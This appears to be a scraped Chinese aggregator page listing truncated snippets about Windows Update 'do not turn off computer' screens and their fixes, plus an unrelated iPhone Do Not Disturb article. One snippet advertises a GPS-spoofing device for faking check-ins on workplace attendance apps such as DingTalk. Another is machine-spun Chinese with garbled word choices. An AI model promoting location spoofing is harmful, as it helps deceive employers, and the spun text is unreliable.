置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57